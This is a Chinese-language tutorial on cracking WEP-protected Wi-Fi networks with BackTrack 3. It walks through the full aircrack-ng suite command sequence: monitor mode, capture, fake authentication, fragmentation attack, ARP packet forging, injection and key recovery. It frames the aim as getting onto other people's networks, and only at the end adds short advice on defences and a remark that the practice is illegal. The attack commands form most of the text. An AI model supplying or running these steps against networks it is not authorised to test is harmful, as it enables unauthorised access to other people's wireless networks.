BackTrack是基于SLAX的自启动运行光盘，是基于linux发行版的系统。目前使用最多的是V3 Final版本，但这个版本对少数网卡支持存在一些问题，所以V3 Beta版本仍有部分人在使用。BackTrack集中了无线网络几乎能见到的安全和破解工具，可谓无线网络破解的百宝箱，全球各地的人使用它破解了无数的无线网络，从侧面促进了大众无线网络安全意识的迅速提高。

BackTrack3

    由于我们需要在BT3下破解，而使用的是Windows系统，所以需要在虚拟机下安装BT3CD版。安装系统类型选择Linux，空间需要大于4GB，具体安装过程与其他系统并无两样，下面主要讲解一下进入系统后的破解工作。

    打开终端窗口，输入以下命令（括号内为解释内容）：

    ifconfig -a （查看无线网卡Mac地址）

    airmon-ng start wifi0 5

    （其中wifi0是电脑里面给无线网卡的，一般都是这个，用ifconfig -a命令可以看得到。wifi0 后面的5是需要破解AP频道，可以在左下角开始菜单里面，找到第二项Internet中的无线网工具，查看AP的频道Channel。然后会看到出现一个 Ath1，格式为XXX1样式）

    airodump-ng --ivs -w name -c 5 ath1  （5和ath1根据自己的结果修改）

    aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 （XX内容为MAC地址）

    aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

    packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp （XX是网卡MAC地址，XXXXX-XXXXXX就是上次命令返回的文件名）

    aireplay-ng -2 -r mrarp -x 1024 ath1

    打开一个新的窗口，运行

    aircrack-ng -n 64 -b ap_mac name-XX.ivs（name-XX.ivs需要到桌面生成文件夹里查看，找到序号最大的那个）

    一般情况下，用不了太久，密码就会显示出来，当然只局限于破解WEP加密方式。

    防范与总结

    要杜绝WEP加密方式，另外最好的办法就是在无线路由器上采取MAC绑定，对准入MAC进行白名单处理，不过这种方法不太适合公用场合的AP，但换一种加密方法还是比较容易的。

设置准入设备防止蹭网者连接无线网络

    对于无线破解来说并不复杂，掌握了基本的方法后破解效率觉得称得上高效，不过随着上网资费的下调，蹭网情况会越来越少，加之卡皇设备功率大，辐射也不容小视，并且从法律的角度也是不允许这种行为的。希望广大网友提高警惕，保护好自己的无线网络。